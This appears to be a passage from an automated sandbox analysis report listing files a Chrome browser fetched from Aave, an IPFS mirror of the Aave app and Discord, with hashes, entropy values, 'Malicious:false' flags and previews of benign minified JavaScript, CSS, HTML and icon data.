                                                                                                                                                                                                                                                  SHA-512:CE7DC991E5F74EC4253C2AE95F246859488D6720F33A86F4C92E3C6730C1DCB50A9EA2F486871FAB4C54BD09E616FD8970F524C23A4F1C72948C9748BBFAE082
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/manifest.json
                                                                                                                                                                                                                                                  Preview:{. "short_name": "Aave",. "name": "Aave",. "description": "Non-custodial liquidity protocol",. "iconPath": "aave.svg",. "icons": [. {. "src": "favicon32.png",. "sizes": "32x32",. "type": "image/png". }. ],. "start_url": "./index.html",. "display": "standalone",. "theme_color": "#1B2030",. "background_color": "#ffffff".}.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (42515), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):42515
                                                                                                                                                                                                                                                  Entropy (8bit):5.483805581313712
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:ppvgSTvX3mX/KNzv56gXDxJXtRiWKTy7AaeDV5rfhDdXCj6XA1H2:bB/E/SzRRpxFk
                                                                                                                                                                                                                                                  MD5:24FC5DDCE0BFBBB1BF945323B4DB7B34
                                                                                                                                                                                                                                                  SHA1:7418B8D62936AFC0AD60A1100BC74195CA51AB68
                                                                                                                                                                                                                                                  SHA-256:11C883C8B1E32A809BDCF7A3001C077B6280127EC3878DDA23ECC726E42A82F1
                                                                                                                                                                                                                                                  SHA-512:119BD76CFEFA0418D5481245A29458164E14B88E71533A605ECB544F32A5643CCF22E8D32475F9F1FF05BF83B8303BBEDE9C1CBD15F4A7EC33D88A1693F48990
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8977],{75158:function(e,r,t){t.d(r,{Z:function(){return k}});var n=t(63366),a=t(87462),o=t(67294),s=t(86010),i=t(94780),c=t(41796),u=t(37743),l=t(54235),d=t(85893),p=(0,l.Z)((0,d.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),m=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),h=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),f=t(36622),v=t(78884),x=t(81719),y=t(34867);function g(e){return(0,y.Z)("MuiCheckbox",e)}var b=(0,t(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const A=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProp
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5507), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5507
                                                                                                                                                                                                                                                  Entropy (8bit):5.481030461721088
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:lMtWr4S/EVqZDO9OaSlzXXEn2PLSpUiA+xasakqNETmycVoYVj6wHyC2oRO0:+rV+0SlznE2DSpzA+xnqyBcvhvs0
                                                                                                                                                                                                                                                  MD5:EA272551F134504A115FC4C84C3BBE93
                                                                                                                                                                                                                                                  SHA1:75F3C62FE62A928C4A5A0F7BD56C686EB620BCA4
                                                                                                                                                                                                                                                  SHA-256:A47B6968BAFBEF87B8145C2442ACE30F845787A69D59AA95860F7FEA97E5DF19
                                                                                                                                                                                                                                                  SHA-512:AFDAD0A6729DE5026FB373CC80A7E61A5125B48046B394188F41932E34D937CB547F244DBA8B1E049F440198DB6FBC4ABD8B3487ABF0FEB522559CCA97F84BB0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:!function(){"use strict";var e={},t={};function n(r){var c=t[r];if(void 0!==c)return c.exports;var f=t[r]={id:r,loaded:!1,exports:{}},a=!0;try{e[r].call(f.exports,f,f.exports,n),a=!1}finally{a&&delete t[r]}return f.loaded=!0,f.exports}n.m=e,n.amdO={},function(){var e=[];n.O=function(t,r,c,f){if(!r){var a=1/0;for(u=0;u<e.length;u++){r=e[u][0],c=e[u][1],f=e[u][2];for(var o=!0,d=0;d<r.length;d++)(!1&f||a>=f)&&Object.keys(n.O).every((function(e){return n.O[e](r[d])}))?r.splice(d--,1):(o=!1,f<a&&(a=f));if(o){e.splice(u--,1);var i=c();void 0!==i&&(t=i)}}return t}f=f||0;for(var u=e.length;u>0&&e[u-1][2]>f;u--)e[u]=e[u-1];e[u]=[r,c,f]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,c){if(1&c&&(r=this(r)),8&c)return r;if("object"===typeof r&&r){if(4&c&&r.__esModule)return r;if(16&c&&"function"===ty
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15405), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15405
                                                                                                                                                                                                                                                  Entropy (8bit):5.283283772460458
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Gpv07TvQbuLzxFr+twp/xAvMl3sj4DhcU1PSHhKdKsO:Gpv07TvQbuL/r+Wp/xAvMl3scDqU1PSX
                                                                                                                                                                                                                                                  MD5:09F41FD89125DE512EF1143581A2C365
                                                                                                                                                                                                                                                  SHA1:4511A9945A20F0C253EE8611987F3F012AE2BFA2
                                                                                                                                                                                                                                                  SHA-256:04FC7F398FC64695B772B291652CDA5ACE6E2E9A45D78015B8E4C73BB458C82A
                                                                                                                                                                                                                                                  SHA-512:DC8CD94F4D98E8047CB9FCBFBF24610CE9A9D42F3165163FC5205C5EB3AD5F87E6C645DCB6176A0F5152AC7399EA02C3439B899556F21FA19D2D4305EDBF631A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/4506-02a1164e49710964.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4506],{75158:function(e,t,r){r.d(t,{Z:function(){return M}});var n=r(63366),l=r(87462),o=r(67294),c=r(86010),i=r(94780),a=r(41796),s=r(37743),p=r(54235),d=r(85893),f=(0,p.Z)((0,d.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),u=(0,p.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),y=(0,p.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),h=r(36622),m=r(78884),x=r(81719),k=r(34867);function O(e){return(0,k.Z)("MuiCheckbox",e)}var v=(0,r(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const j=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProp
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17873), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17873
                                                                                                                                                                                                                                                  Entropy (8bit):5.550287362084471
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:lyPmJ0O3//4buQI6nPQH2P4C+KB+/mpAgVDmBLVNxx:lyP40OobR3nP5qmpAgpO/xx
                                                                                                                                                                                                                                                  MD5:2E91687C54457973E02DCAD3A6EE9762
                                                                                                                                                                                                                                                  SHA1:4D902F55AA2842CBEEEA5BE2FC48A05745609FAC
                                                                                                                                                                                                                                                  SHA-256:8D5B5E38BEC688DF3F6D8AB57081E8C32B3BA939A0A36640BA184A8DC04C0AF9
                                                                                                                                                                                                                                                  SHA-512:B2FEFB4E56E04F761C3941F1339708520A7F8C1B8FFC6235CF343C47B9827677392549F5B231808B5441D598346C8E903DB91086C94253662AEC8E98E7093D2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/9447-905d9c1c85542ff2.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9447],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var i=n(t(64938)),o=t(85893),s=(0,i.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=s},9144:function(e,r,t){var n=t(63366),i=t(87462),o=t(67294),s=t(95408),a=t(98700),c=t(39707),l=t(59766),d=t(81719),u=t(78884),x=t(85893);const h=["component","direction","spacing","divider","children"];function m(e,r){const t=o.Children.toArray(e).filter(Boolean);return t.reduce(((e,n,i)=>(e.push(n),i<t.length-1&&e.push(o.cloneElement(r,{key:`separator-${i}`})),e)),[])}const v=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):24565
                                                                                                                                                                                                                                                  Entropy (8bit):6.000976601202208
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xakxHbO0x9ipfSEuH44B445H44Q544Aq44Q4P44ZF944Q4Q4424Qb444nxWl444p:xZxH5ripqEuH44B445H44Q544Aq44Q4+
                                                                                                                                                                                                                                                  MD5:EC2C34CADD4B5F4594415127380A85E6
                                                                                                                                                                                                                                                  SHA1:E7E129270DA0153510EF04A148D08702B980B679
                                                                                                                                                                                                                                                  SHA-256:128E20B3B15C65DD470CB9D0DC8FE10E2FF9F72FAC99EE621B01A391EF6B81C7
                                                                                                                                                                                                                                                  SHA-512:C1997779FF5D0F74A7FBB359606DAB83439C143FBDB52025495BDC3A7CB87188085EAF12CC434CBF63B3F8DA5417C8A03F2E64F751C0A63508E4412EA4E7425C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:............ .h...F... .... .........00.... ..%..V......... ..$...:..(....... ..... ..........................................dX2.dX..dW..dW..dX..dX..dX..dX2.........................dW..dW..dX..eX..eX..eX..eX..eX..eX..dW..dW..dW..............dW..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........dW..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW......dX2.dW..eX..eX..|q......eX..eX..eX..eX......|q..eX..eX..eX..eX2.dW..eX..eX..........................................eX..eX..eW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..............eX..........eX..............eX..eX..dW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..~s..................................~s..eX..eX..dW..dW..eX..eX..eX..................................eX..eX..eX..dW..dX2.eX..eX..eX..h[..........{p..{p..........h[..eX..eX..dW..eW2.....dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........eX..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..e
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                                  Entropy (8bit):4.37144473219773
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                                                                                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                                                                                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                                                                                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                                                                                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js
                                                                                                                                                                                                                                                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25421), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):25421
                                                                                                                                                                                                                                                  Entropy (8bit):5.434407177604553
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:IyPmEeXYMad2bJ+GxIpi0eR2H0wUfbsrB2endNxstZLrt11slfHM:IyPfeoMasWpB0JI4ZPt11sl0
                                                                                                                                                                                                                                                  MD5:B380F675F1CF29F13F03AE90970F8677
                                                                                                                                                                                                                                                  SHA1:84F4B920331001D27F92BA933B2E72909C278A05
                                                                                                                                                                                                                                                  SHA-256:281D57BF1FDA192BB5E86A1753E4E5770B5C9CBCFE5CCF2D24577E8AF479DF54
                                                                                                                                                                                                                                                  SHA-512:DAE91423C83DE18827861701659A2B3B493591FFDE7AC61F81CCCF68DAD30589B45DE6B1F21595A5B2790449C3769AE8E17FD48DDEEEF0D348BA92E3320F8BA6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7828.bc42be26a9e94bb7.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7828],{62753:function(e,r,n){var t=n(64836);r.Z=void 0;var o=t(n(64938)),i=n(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=s},89722:function(e,r,n){n.d(r,{Z:function(){return v}});var t=n(87462),o=n(63366),i=n(67294),s=n(86010),a=n(94780),c=n(81719),l=n(78884),d=n(36622),u=n(34867);function p(e){return(0,u.Z)("MuiIcon",e)}(0,n(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=n(85893);const x=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50864), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):50864
                                                                                                                                                                                                                                                  Entropy (8bit):5.3522605432239265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:TjDORnGYYk6RRmDsQWFkkCCU+N+BPiYHWdcy0r51/5HIkcstelT8wO2422nDzUrZ:XwsBiB6HtMqst4Q32GDzf/jyMo
                                                                                                                                                                                                                                                  MD5:1034A0DE7FBC269CCFC9DDBA4AA147EC
                                                                                                                                                                                                                                                  SHA1:DE3DB06BD3FD7926CE07F376978E87924D0302D8
                                                                                                                                                                                                                                                  SHA-256:EB65666971304741EB5BE24D3F0A19071CB2F6B6A9D4AB8E02C5FDA397B25B85
                                                                                                                                                                                                                                                  SHA-512:4806163B04146C031B8D2AF76A58AFDE313B2D5D68308F85803BE0C5C5EC1E91B318327502863ACF17C32B552EB5FBDD4ED4D8F57AFA491875267F244998BD6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/2284-c8e8c4a9494b7235.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2284],{36919:function(t,e,n){"use strict";var r=n(51833);function i(t,e){for(var n in e)o(e,n)&&(t[n]=e[n])}function o(t,e){return Object.prototype.hasOwnProperty.call(t,e)}t.exports=function(t){r(t)||(t={});for(var e=arguments.length,n=1;n<e;n++){var o=arguments[n];r(o)&&i(t,o)}return t}},9675:function(t,e,n){"use strict";const r=n(33596),i=n(21006),o=n(45294),a=n(9809),s=n(38497),c=n(86378),u=n(28181),l=n(79254),p=n(55707);function f(t,e){if(""===t)return{data:{},content:t,excerpt:"",orig:t};let n=u(t);const r=f.cache[n.content];if(!e){if(r)return n=Object.assign({},r),n.orig=r.orig,n;f.cache[n.content]=n}return function(t,e){const n=o(e),r=n.delimiters[0],a="\n"+n.delimiters[1];let c=t.content;n.language&&(t.language=n.language);const u=r.length;if(!p.startsWith(c,r,u))return s(t,n),t;if(c.charAt(u)===r.slice(-1))return t;c=c.slice(u);const d=c.length,h=f.language(c,n);h.name&&(t.language=h.name,c=c.slice(h.raw.length));let g=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):92925
                                                                                                                                                                                                                                                  Entropy (8bit):5.381783477557527
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:h5p4ywfFn9A6/KoeRDkwpxK1BINxSC2PlPs6x/xms:aywfFn9A6/KoeRjwcxSC2PlPs6x5ms
                                                                                                                                                                                                                                                  MD5:F620C8F60BB263A59A7913268A37CE50
                                                                                                                                                                                                                                                  SHA1:8A05C6DA62F684289A95F4E80A01BB092ACD38F8
                                                                                                                                                                                                                                                  SHA-256:DF4B29216B59BC504BC6D4664004BE17601F7AB3884ED1E5B44FFF05D47CA3B7
                                                                                                                                                                                                                                                  SHA-512:D85BE08C18815941DB6142C6E8A17E4E5EBD57E6431C9FDBBF8F21A7D7F5F9A27771C6F054AAEA936188574A8BCC651956074A5FD318E035925C469588DFFD37
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source Liquidity Protocol"/><meta property="og:description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twitter:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twit
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16551)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):26638
                                                                                                                                                                                                                                                  Entropy (8bit):5.189493978235107
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xG48UrNMoD2L24/tUmUMVQanDse4lxoSurNxR3TN+:AwNuVNUOD54DoT93TU
                                                                                                                                                                                                                                                  MD5:68A17A47DBD03658ACE68552633BC80C
                                                                                                                                                                                                                                                  SHA1:1421B76CFED404F4CAB46FA9D72B1FFA5E604CD6
                                                                                                                                                                                                                                                  SHA-256:C82E39AAA2851A4A5D5D79DC30C0EBA347743842DB1036F3D93DA0F707D5F344
                                                                                                                                                                                                                                                  SHA-512:CBB78780A778387671004221FBF0FD18185DDB8A8C3DD1093F4B415DBCB5ED1F5493B3CEED32D49850B67191FD5558D1AD2F80E025EA241076EAB149EBB65E52
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/24a0aa8d37ef3037705f.css
                                                                                                                                                                                                                                                  Preview:.discordLogo_b83a05{height:36px;width:112px;background:url(/assets/23a7a3fd6624342117bf.svg)no-repeat;display:none;flex-shrink:0;margin-bottom:16px}.authBox_b83a05{width:480px;padding:var(--custom-auth-box-auth-box-padding);font-size:18px;box-shadow:var(--legacy-elevation-high);border-radius:5px;box-sizing:border-box;color:var(--text-muted)}.authBox_b83a05 a{color:var(--text-link)}.authBox_b83a05 a:hover{-webkit-text-decoration:underline;text-decoration:underline}.authBoxExpanded_b83a05{width:784px}.centeringWrapper_b83a05{width:100%;text-align:center}.avatar_b83a05{margin-bottom:24px}@media(max-width:485px){.authBox_b83a05{position:absolute;top:0;right:0;bottom:0;left:0;padding:20px 16px;width:100%;height:100%;display:flex;align-items:center;flex-direction:column;background:linear-gradient(to left bottom,#3d4046,#1e1e23);border-radius:0;overflow:scroll}.authBox_b83a05 .discordLogo_b83a05{display:block}@media(max-width:830px){.authBox_b83a05.authBoxExpanded_b83a05{max-width:none}}.auth
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35659), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):35659
                                                                                                                                                                                                                                                  Entropy (8bit):5.444564509616748
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:OyPs69ilDq/6Eokq/kcnzFHwWvDn3pZ7jWSK5FnFVzmCtMGbJX:o/PNHwWv63nBLX
                                                                                                                                                                                                                                                  MD5:F6931F2D3F6362D8A7B0FCF565FA8A52
                                                                                                                                                                                                                                                  SHA1:FDB7FE0FBC2B7EBB0C316ED65E50842B2E18C900
                                                                                                                                                                                                                                                  SHA-256:EFCD1CDF2B9ACD825CF18822CEDB2BE878A290ED82E2DC29E5D125C474E6B832
                                                                                                                                                                                                                                                  SHA-512:0D4A923CD343CF8E1D46A35D13D9F5796D6C08A50CE1FEBD4CBC1109E0CD7912C75CB83F5AB2A46BD29B5071F79B01BCB7C22A18A473BD1A5109E6BADA39975D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[797],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),s=r(67294),a=r(86010),i=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","classNam
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (21762)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21811
                                                                                                                                                                                                                                                  Entropy (8bit):5.462655463719556
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:f1bjtqrVapZjquHCWnJcJhcby8XziQBy6HUKVMov5hHKs80K:JjtOVaJDnJcPc+EWQ8EM65RR8l
                                                                                                                                                                                                                                                  MD5:0FBB77D1B69F18DF0FDCF836DE1C4106
                                                                                                                                                                                                                                                  SHA1:E8CE4037B97732809F1E1BF24992959C678F2118
                                                                                                                                                                                                                                                  SHA-256:279E49A00A41A18545CF319B5A8B571FD48CFCC4B78A361BBE75A33CE7A4F71A
                                                                                                                                                                                                                                                  SHA-512:F73E3B25561D0D3307C7DD9D505F84101897CFA70737D757AED8D95BDC6A2CE116FD114674DD0BBE666AABE2176B0EEF150A5D4EE2C7C3CCE815A5CA73215D03
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["71984"],{772425:function(t,r,n){var e=n(933676),o=n(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},603528:function(t,r,n){var e=n(838957),o=TypeError;t.exports=function(t,r){if(e(r,t))return t;throw o("Incorrect invocation")}},212036:function(t){t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},192291:function(t,r,n){var e,o,i,u=n(212036),f=n(325008),a=n(161581),c=n(354848),s=n(622281),y=n(740362),p=n(974971),h=n(938507),v=n(251069),d=n(859209),g=n(4340),l=n(838957),A=n(144748),w=n(276321),x=n(641236),b=n(457507),T=n(644659),E=T.enforce,I=T.get,R=a.Int8Array,m=R&&R.prototype,O=a.Uint8ClampedArray,M=O&&O.prototype,F=R&&A(R),U=m&&A(m),_=Object.prototype,L=a.TypeError,B=x("toStringTag"),C=b("TYPED_ARRAY_TAG"),S="TypedArrayConstructor",P=u&&!!w&&"Opera"!==p(a.opera),V=!1,N={Int8Array:1,Uint8Array:1,Uint8ClampedArray:1,Int16Array:2,U
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
